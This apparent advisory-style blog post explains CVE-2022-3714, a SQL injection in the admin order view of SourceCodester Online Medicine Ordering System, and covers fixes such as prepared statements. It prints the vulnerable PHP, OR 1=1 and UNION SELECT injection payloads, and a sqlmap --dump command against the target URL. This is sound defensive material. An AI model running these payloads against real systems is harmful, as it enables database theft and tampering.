CVE CyberSecurity Database News

CVE-2022-3714 - Critical SQL Injection in SourceCodester Online Medicine Ordering System 1. (VDB-212346) Explained

Poster -

In late 2022, security researchers discovered a critical vulnerability (CVE-2022-3714) in the widely used SourceCodester Online Medicine Ordering System 1.. This flaw allows attackers to execute SQL Injection attacks by manipulating the id parameter in the admin panel’s order view page. If your organization uses this system or if you’re a developer tasked with securing similar PHP/MySQL applications, this post is for you.

CVE-2022-3714 is a SQL Injection vulnerability present in an unknown function within

/admin/?page=orders/view_order

Vulnerability Database Reference: VDB-212346

When an attacker crafts a special request, they can insert malicious SQL into the id parameter. If successful, the attacker may read, modify, or delete database contents—even gain access to sensitive information or take control of the web application.

Targeted URL

http://<target>/admin/?page=orders/view_order&id=YOUR_INPUT_HERE

Problem:
The backend code fetches the id parameter from the URL and adds it directly into a SQL query without sanitization.

Example Vulnerable PHP Code

<?php
// File: admin/orders/view_order.php

$id = $_GET['id'];
$query = "SELECT * FROM orders WHERE id = $id"; // No sanitization!
$result = mysqli_query($conn, $query);

// ...rest of the code
?>

Because $id is not checked or cleaned, an attacker can tamper with the id value to inject arbitrary SQL.

An attacker can submit URLs like

http://<target>/admin/?page=orders/view_order&id=1 OR 1=1

This turns the SQL into

SELECT * FROM orders WHERE id = 1 OR 1=1

This query always returns all orders, breaching privacy.

Extracting Data via SQL Injection

Attackers can comment out the rest of the query, or use union injections to retrieve more information.

Example

http://<target>/admin/?page=orders/view_order&id=1 UNION SELECT user(),database(),version(),4--

This can reveal database user, name, version, and more.

Using SQLMap for Automated Attacks

SQLMap is a popular open-source penetration testing tool that automates exploiting SQL injection flaws.

Example Command

sqlmap -u "http://target/admin/?page=orders/view_order&id=1"; --cookie="PHPSESSID=..." --dump

Potential Impacts

- Database Disclosure: Download any data from the database (usernames, passwords, medicine records, etc.).

Database Manipulation: Change or inject malicious data.

- Full System Compromise: In some setups, attackers can further escalate privileges, upload webshells, or pivot inside your network.

Suppose an admin views orders at

/admin/?page=orders/view_order&id=5

If an attacker sends

/admin/?page=orders/view_order&id=5 UNION SELECT 1, 'hacked', 'by', 'attacker'--

The application may display a page with 'hacked by attacker' if results are shown ("in-band" injection).

Mitigation & Fix

1. Always Use Prepared Statements / Parameterized Queries!

SAFE CODE EXAMPLE

<?php
$stmt = $conn->prepare("SELECT * FROM orders WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);
$stmt->execute();
$result = $stmt->get_result();
?>

Accept only numbers for id. Always cast as an integer

$id = (int) $_GET['id'];

Update Your Application:

If you use SourceCodester’s script, check for official patches/updates on their website.

Restrict Admin Access:

Reduce public exposure of the /admin/ directory using firewalls or HTTP auth.

References

- Vulnerability details on VulDB
- Exploit details on CXSecurity
- Original project page
- SQL Injection (OWASP)

Conclusion

CVE-2022-3714 is a textbook example of why user input should never be trusted, especially in admin pages. Even if your app is for a “small business,” attackers worldwide automate exploitation of these types of bugs. Patching, input validation, and using parameterized SQL queries are your best protection.

Timeline

Published on: 10/27/2022 10:15:00 UTC
Last modified on: 10/28/2022 18:29:00 UTC